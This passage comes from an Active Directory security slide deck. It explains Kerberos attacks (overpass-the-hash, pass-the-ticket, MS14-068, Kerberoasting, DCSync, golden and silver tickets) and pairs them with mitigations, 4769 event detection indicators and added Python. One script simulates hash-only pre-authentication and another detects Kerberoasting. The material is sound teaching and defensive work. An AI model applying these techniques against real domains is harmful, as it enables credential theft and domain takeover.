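    if not hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum):
        raise ValueError("RC4-HMAC integrity check failed (wrong key or tampered data)")
    return data[8:]                            # drop the confounder


PA_ENC_TIMESTAMP = 1   # RFC 4120 key usage for the AS-REQ pre-auth timestamp


def client_preauth(key, now):
    """What the client sends: the current time encrypted under its key (the NT hash for RC4)."""
    return rc4_hmac_encrypt(key, PA_ENC_TIMESTAMP, now.isoformat().encode())


def kdc_accepts(key, blob, now, skew=timedelta(minutes=5)):
    """Model of the KDC check: decrypt with the account's key and require a fresh timestamp."""
    try:
        stamp = datetime.fromisoformat(rc4_hmac_decrypt(key, PA_ENC_TIMESTAMP, blob).decode())
    except ValueError:
        return False
    return abs(now - stamp) <= skew


def overpass_demo(password="password"):
    """Attacker holds only nt_hash(password); returns what the modelled KDC decides."""
    now = datetime(2017, 6, 1, 12, 0, tzinfo=timezone.utc)
    stolen = nt_hash(password)
    blob = client_preauth(stolen, now)
    return {"hash": stolen.hex(),
            "accepted_with_hash_only": kdc_accepts(stolen, blob, now),
            "rejected_with_other_key": not kdc_accepts(nt_hash(password + "x"), blob, now),
            "rejected_as_replay": not kdc_accepts(stolen, blob, now + timedelta(minutes=10))}


if __name__ == "__main__":
    print(overpass_demo())
```

Two things fall out of this. The whole exchange never needs the password, which is why dumping hashes is enough; and the KDC only sees that etype 23 was used, which is why the RC4 (0x17) encryption type in Kerberos events is the detection hook the later slides rely on.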
58. Pass the Key (Overpass the Hash) (screenshot)
• User "labgg" is a Domain Admin logged in on the compromised machine
59. Pass the Key (Overpass the Hash) (screenshot)
60. Pass the Key (Overpass the Hash) (screenshot)
• Some bug with Empire's "shell" command, so switched to Meterpreter
61. Pass the Key (Overpass the Hash)
• More information: http://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-hash-with-mimikatz/ and http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
62. Pass the Ticket
• Export the Ticket-Granting Ticket (TGT) from the memory of a compromised host
• Import the TGT into the attacker's machine; no password or hash is needed, and the ticket stays valid until it expires (10 hours by default)
• Profit!
63. Pass the Ticket with MS14-068
• MS14-068
  • Privilege escalation from an authenticated domain user to Domain Admin by forging the PAC
  • The PAC stores authorization data (group membership, security identifiers)
  • The KDC improperly validated the Privilege Attribute Certificate (PAC) signature, accepting checksum types that do not require the KRBTGT key
64. Pass the Ticket with MS14-068
• More information: https://labs.mwrinfosecurity.com/blog/digging-into-ms14-068-exploitation-and-defence/, https://www.trustedsec.com/december-2014/ms14-068-full-compromise-step-step/ and https://github.com/bidord/pykek/
65. Pass the Ticket with MS14-068 (screenshot)
66. Kerberoasting
• A service ticket can be requested for any SPN without ever presenting it to the service
• The service ticket issued by the TGS is encrypted with the target service account's secret key
• Service accounts are usually privileged accounts on the domain, and their passwords are often weak and rarely rotated
67. Kerberoasting
• Why not just crack it?
  • Offline attack, without contacting the target service's machine
• Source: https://adsecurity.org/?p=2293
70. Kerberoasting: Mitigation
• Use passwords of 25 or more characters for service accounts
• Use Managed Service Accounts (the password is machine-generated and rotated automatically)
• More information: https://adsecurity.org/?p=2293 and https://technet.microsoft.com/en-us/library/dd548356(v=ws.10).aspx
71. Kerberoasting: Detection
• Enable "Audit Kerberos Service Ticket Operations" for Success
• Look for Event ID 4769 with Ticket Options 0x40810000 and Ticket Encryption Type RC4 (0x17 / 0x18)
• Create a honey service: an account with an SPN that nothing legitimately requests, so any 4769 for it is an alert ☺
• More information: https://adsecurity.org/?p=3458 and https://adsecurity.org/?p=3513
72. Lateral Movement: Mitigation
• Deploy Microsoft LAPS on servers and workstations to manage local Administrator passwords
• Deploy the Group Policies "Deny access to this computer from the network" and "Deny log on through Remote Desktop Services" for "Local account and member of Administrators group" (S-1-5-114), which also blocks the RID 500 account
• Add users with high privileges to the "Protected Users" group if possible
• Network segmentation: it's always about the trust path
• Restrict workstation-to-workstation communication with the Windows Firewall via GPO
• More information: https://adsecurity.org/?p=3299, https://adsecurity.org/?p=3377 and https://technet.microsoft.com/en-us/library/dn466518.aspx
73. Lateral Movement: Mitigation
• Different tiers of administrators for different tiers of servers and workstations (Tier 0 for Domain Controllers, Tier 1 for servers, Tier 2 for workstations), so a credential from a lower tier never appears on a higher-tier system
• More information: https://technet.microsoft.com/en-us/library/mt631193.aspx
74. Lateral Movement: Detection
• Turn on auditing for local account logons
• Turn on auditing for Kerberos
  • Look out for domain names in lower case or otherwise non-standard in the events; forged tickets often carry them (not comprehensive)
  • Look out for Ticket Encryption Type 0x17 / 0x18 (RC4) (not comprehensive)
• More information: https://dfir-blog.com/2015/12/13/protecting-windows-networks-kerberos-attacks/ and https://dfir-blog.com/2016/03/13/how-to-parse-windows-eventlog/
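Slides 71 and 74 give the raw indicators for Kerberoasting in 4769 events; turning them into something that runs over a log feed is an added example in Python (not the deck's code). The events are constructed; their field names follow the 4769 schema (TargetUserName is the requesting account, ServiceName the account that owns the SPN). The honey account name svc_honey and the burst threshold are assumptions to tune per environment. Three rules are applied: a honey SPN was requested, an RC4 service ticket was issued for a user-owned SPN, and one requester asked for many distinct SPNs in a short window, which is what Kerberoast tooling looks like regardless of etype.

```python
"""Triage Kerberos service ticket events (4769) for Kerberoasting.

Added example, not the deck's own code. The events below are constructed; field
names follow the 4769 event schema. HONEY_SERVICE_ACCOUNTS and the burst numbers
are assumptions: plant an SPN on an account nothing uses, and baseline the rest.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_ETYPES = {"0x17", "0x18"}            # RC4-HMAC / RC4-HMAC-EXP
KERBEROAST_OPTIONS = "0x40810000"        # ticket options the slide calls out
HONEY_SERVICE_ACCOUNTS = {"svc_honey"}   # assumed decoy account with an SPN
BURST_THRESHOLD = 5                      # distinct SPN accounts from one requester
BURST_WINDOW = timedelta(minutes=5)


def _event(time, user, service, etype, ip, options=KERBEROAST_OPTIONS, status="0x0"):
    return {"TimeCreated": time, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "TicketOptions": options,
            "IpAddress": ip, "Status": status}


SAMPLE_EVENTS = [   # constructed
    _event("2017-06-01T09:00:00", "alice@CORP.LOCAL", "svc_sql", "0x12", "10.0.0.5"),
    _event("2017-06-01T09:00:07", "WS01$@CORP.LOCAL", "WS02$", "0x12", "10.0.0.5"),
    _event("2017-06-01T09:01:00", "alice@CORP.LOCAL", "krbtgt", "0x12", "10.0.0.5"),
    *[_event(f"2017-06-01T09:02:0{i}", "bob@CORP.LOCAL", svc, "0x17", "10.0.0.9")
      for i, svc in enumerate(["svc_sql", "svc_backup", "svc_web", "svc_honey", "svc_sccm", "svc_iis"])],
    _event("2017-06-01T09:05:00", "carol@CORP.LOCAL", "svc_web", "0x17", "10.0.0.12",
           status="0x7"),   # failed request (KDC_ERR_S_PRINCIPAL_UNKNOWN): not a ticket
]


def _is_user_service_account(name):
    """Computer accounts and krbtgt are not Kerberoast targets."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def analyze_4769(events):
    alerts = []
    requests = defaultdict(list)          # (requester, ip) -> [(time, service)]
    for e in events:
        if e["Status"] != "0x0":          # only issued tickets matter
            continue
        service = e["ServiceName"]
        if not _is_user_service_account(service):
            continue
        when = datetime.fromisoformat(e["TimeCreated"])
        base = {"user": e["TargetUserName"], "ip": e["IpAddress"], "service": service, "time": when}
        if service in HONEY_SERVICE_ACCOUNTS:
            alerts.append({"rule": "honey_spn", **base})
        if e["TicketEncryptionType"] in RC4_ETYPES:
            alerts.append({"rule": "rc4_service_ticket",
                           "kerberoast_options": e["TicketOptions"] == KERBEROAST_OPTIONS, **base})
        requests[(e["TargetUserName"], e["IpAddress"])].append((when, service))
    for (user, ip), reqs in requests.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            window = {svc for t, svc in reqs[i:] if t - start <= BURST_WINDOW}
            if len(window) >= BURST_THRESHOLD:
                alerts.append({"rule": "spn_burst", "user": user, "ip": ip,
                               "distinct_spns": len(window), "time": start})
                break                      # one alert per requester is enough
    return alerts


def summarize(alerts):
    counts = defaultdict(int)
    for alert in alerts:
        counts[alert["rule"]] += 1
    return dict(counts)


if __name__ == "__main__":
    found = analyze_4769(SAMPLE_EVENTS)
    print(summarize(found))
    for alert in found:
        print(alert["rule"], alert["user"], alert.get("service", alert.get("distinct_spns")))
```

The RC4 rule is the noisy one: any legacy application still negotiating RC4 will fire it, which is why the slide marks it "not comprehensive" and why the honey SPN and the burst rule carry more weight. The ticket options value is recorded rather than required, since clients vary.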
75. Persistence
• Hash dump & crack the hashes
• Golden Ticket
• Silver Ticket
76. Hash Dump & Crack the Hashes
• Old school
  • Get the NTDS.dit file from a backup, a virtual machine disk or a Volume Shadow Copy
  • Process NTDS.dit (together with the SYSTEM hive, which holds the key it is encrypted with) for hashes
• New school
  • DCSync (no need for direct access to NTDS.dit)
77. DCSync
• Impersonate a Domain Controller
• Replicate user credentials via the Directory Replication Service (DRS) Remote Protocol
• No code execution on the DC is required, but "Domain Admins" privilege (or the "Replicating Directory Changes" and "Replicating Directory Changes All" rights on the domain) is needed
• If performed with a "Domain Controllers" account it looks like ordinary replication, so it will not stand out in the logs
79. Golden Ticket
• A forged TGT with admin privileges, then Pass the Ticket
• A TGT is encrypted and signed with the domain KRBTGT account's secret key
• Important to note that KRBTGT's password is almost never changed
• Information required to create a Golden Ticket
  • Domain name
  • Domain SID
  • Domain KRBTGT NTLM hash / (e)keys
  • User ID to impersonate
83. Silver Ticket
• A forged service ticket
• Requires only the service account's key instead of KRBTGT's
• Access is restricted to that specific service, and because the DC is never contacted there is no 4769 for it on the DC
• More information: https://adsecurity.org/?p=2011
86. Persistence: Mitigation and Detection
• Change the KRBTGT password twice (the KDC still accepts tickets signed with the previous password, so one change is not enough) and do it regularly
• Look out for RC4 Kerberos traffic: from Vista / Server 2008 onwards the default Kerberos cipher is AES, so RC4 tickets stand out (not comprehensive)
• Use Group Managed Service Accounts
• More information: https://adsecurity.org/?p=1515
87. Mitigations for PowerShell Activities
• Lock down PowerShell.exe and PowerShell_ISE.exe (not ideal: the PowerShell engine can be hosted from other processes)
• Uninstall PowerShell v2 (it lacks the v5 logging and is used to downgrade around it)
• Use PowerShell v5 with
  • Constrained Language Mode enforced through AppLocker / Device Guard
  • Logging of all PowerShell activity (module logging, script block logging, system-wide transcription)
• More information: https://adsecurity.org/?p=2604
88. Microsoft Advanced Threat Analytics (ATA)
• Machine-learning platform that detects quite a number of the things discussed here
• Receives logs and events from a SIEM and from Windows Event Forwarding (WEF)
• More information: https://docs.microsoft.com/en-us/advanced-threat-analytics/understand-explore/ata-threats, https://adsecurity.org/?p=1583 and https://gallery.technet.microsoft.com/Advanced-Threat-Analytics-8b0a86bc/file/169608/1/ATA%20Playbook.pdf
89. Microsoft Advanced Threat Analytics (screenshot)
• Source: https://blogs.technet.microsoft.com/enterprisemobility/2015/05/04/microsoft-advanced-threat-analytics-public-preview-release-is-now-available/
91. Reference
• Adversarial Tactics, Techniques & Common Knowledge: https://attack.mitre.org/wiki/Main_Page
• Attack Methods for Gaining Domain Admin Rights in Active Directory: https://adsecurity.org/?p=2362
• Protecting Windows Networks: Kerberos Attacks: https://dfir-blog.com/2015/12/13/protecting-windows-networks-kerberos-attacks/
• The Most Common Active Directory Security Issues and What You Can Do to Fix Them: https://adsecurity.org/?p=1684
• Building an Empire with PowerShell: http://www.slideshare.net/harmj0y/building-an-empire-with-powershell
92. Reference
• Mimikatz and DCSync and ExtraSids, Oh My: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
• Make PowerView Great Again: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
• Six Degrees of Domain Admin: https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Robbins-Vazarkar-Schroeder-Six-Degrees-of-Domain-Admin.pdf
• kerberos, kerberoast and golden tickets: https://leonjza.github.io/blog/2016/01/09/kerberos-kerberoast-and-golden-tickets/
• Mimikatz 2.0 - Silver Ticket Walkthrough: https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Silver_Ticket_Walkthrough.html#Why